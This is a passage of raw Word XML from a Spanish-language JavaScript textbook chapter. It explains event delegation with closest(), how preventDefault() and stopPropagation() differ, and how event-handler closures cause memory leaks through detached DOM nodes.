          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>uno solo en el contenedor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7811623F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>lista.addEventListener("click", (evento) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF2F74F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  const boton = evento.target.closest("[data-accion='agregar']");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D06653E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  if (!boton) return;                       // el clic fue en otra parte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7966E9AA" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  agregarAlCarrito(Number(boton.dataset.productoId));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1F1F8E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510A9414" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>closest()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> sube por los ancestros desde el objetivo hasta encontrar uno que coincida con el selector, y devuelve </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> si no hay ninguno. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Es lo que hace robusta la delegación:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> si el usuario hace clic sobre un ícono </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>adentro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> del botón, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>event.target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> es el ícono, y sin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>closest()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> tu manejador no reconocería ese clic.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="9020" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9020"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="2866D1CA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="85" w:type="dxa"/>
              <w:bottom w:w="85" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1DDFA918" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B7D7533" wp14:editId="5705FE3E">
                  <wp:extent cx="5505563" cy="43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4-3.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5505563" cy="4320000"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B8B0495" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Epgrafe"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Figura 4.3. Delegación frente a un manejador por elemento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3B8591" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>La delegación es el portero del edificio.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> No hay un timbre por departamento: hay un portero en la entrada que recibe a todos y pregunta a quién buscan. Se muda alguien al séptimo y nadie instala nada; cierra el edificio y se va una sola persona. Sus tres ventajas:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4507"/>
        <w:gridCol w:w="4509"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="56514877"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598009C7" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Ventaja</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20040C1C" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Por qué te importa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="10FFB64C"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0755E336" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Menos manejadores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4513" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="04FA4A44" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Menos memoria: cien manejadores son cien clausuras vivas (4.9)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="42B79F83"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D013FCD" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Funciona con elementos que todavía no existen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4513" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="73F96C2B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>El manejador está en el contenedor: no le importa cuándo apareció el botón</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="5689A1FE"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196F4207" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Una sola baja al desmontar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4513" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5C44CD6C" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>removeEventListener</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> en vez de cien</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79186D7A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="0000351B">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65924E93" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="DEEBF7" w:fill="DEEBF7"/>
          </w:tcPr>
          <w:p w14:paraId="392CEA37" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="2E74B5"/>
                <w:sz w:val="20"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>PARA ENTENDER: el botón que llegó después</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B22146E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>La segunda ventaja resuelve un problema que te va a aparecer sí o sí en el TPI.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35766846" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Tenés una lista de pedidos que se actualiza por el canal de eventos. Registrás un manejador en cada botón al cargar la página. Llega un pedido nuevo por SSE, lo agregás... </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>y su botón no anda.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Claro: cuando registraste los manejadores, ese botón no existía.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A8B14A2" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">La salida ingenua es volver a registrar todo tras cada actualización, y ahí te comés el problema de 4.9: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>cada re-registro apila manejadores sobre los elementos viejos</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>, y en media hora de turno tenés cientos.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64A33E1A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Con delegación no existe ninguno de los dos. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Un manejador en el contenedor, y funciona para todo lo que aparezca después.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38DD4328" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc239320003"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.8.4 — Cancelar y detener</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3006"/>
        <w:gridCol w:w="3005"/>
        <w:gridCol w:w="3005"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="02CE1DFD"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B6622A3" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>El método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84B772B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Qué hace de verdad</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227900D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Qué NO hace</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="337A0492"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8612F87" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>preventDefault()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="036925DE" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Cancela la acción por defecto del navegador: que un enlace navegue, que un formulario se envíe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="73DE5544" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>No detiene la propagación.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> El evento sigue recorriendo el árbol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="1CA7D5A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B0E1A0C" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>stopPropagation()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="170A235E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Detiene el recorrido del evento por el árbol: los manejadores de más arriba no se enteran</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7AFB7AED" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>No cancela la acción por defecto.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> El formulario se envía igual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DBB3AF5" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Conviene evitar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>stopPropagation()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> salvo necesidad real: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>rompe la delegación de cualquier manejador registrado más arriba, incluso de uno que alguien agregue meses después.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> El síntoma —un manejador que no se ejecuta, sin motivo aparente— es dificilísimo de rastrear: la causa está en otro archivo, escrita por otra persona.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D1AF0E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulodelcaptulo"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc239320004"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.9 — Ciclo de vida, fugas de memoria y la regla RN-F01</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="01359537" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc239320005"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.9.1 — Qué mantiene vivo a un nodo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="7FAA0C62" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">El recolector de basura de JavaScript libera lo que ya no es </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>alcanzable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> desde el código en ejecución. Esa palabra es toda la sección: no pregunta si lo usás, pregunta si se puede llegar hasta él.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AA0EA7" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Y acá vuelve el Capítulo 3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Un manejador de evento es una clausura</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, y una clausura mantiene vivo todo lo que referencia. Si referencia un elemento del DOM, ese elemento </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>sigue en memoria aunque lo hayas quitado de la página</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">. Un nodo removido que sigue referenciado se llama </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>nodo separado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>: no se ve en pantalla, no aparece en el inspector, y ocupa memoria — él y todo su subárbol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C00F635" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Es el globo atado a la muñeca.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lo soltaste y no lo ves más, pero no se fue a ninguna parte: el hilo sigue atado. La pantalla es lo que mirás; el hilo es la clausura.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF22B6A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc239320006"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.9.2 — Una fuga real</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="74786B61" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>function montarPanelDePedidos(contenedor) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABC5B54" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  const panel = document.createElement("div");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37087F5B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
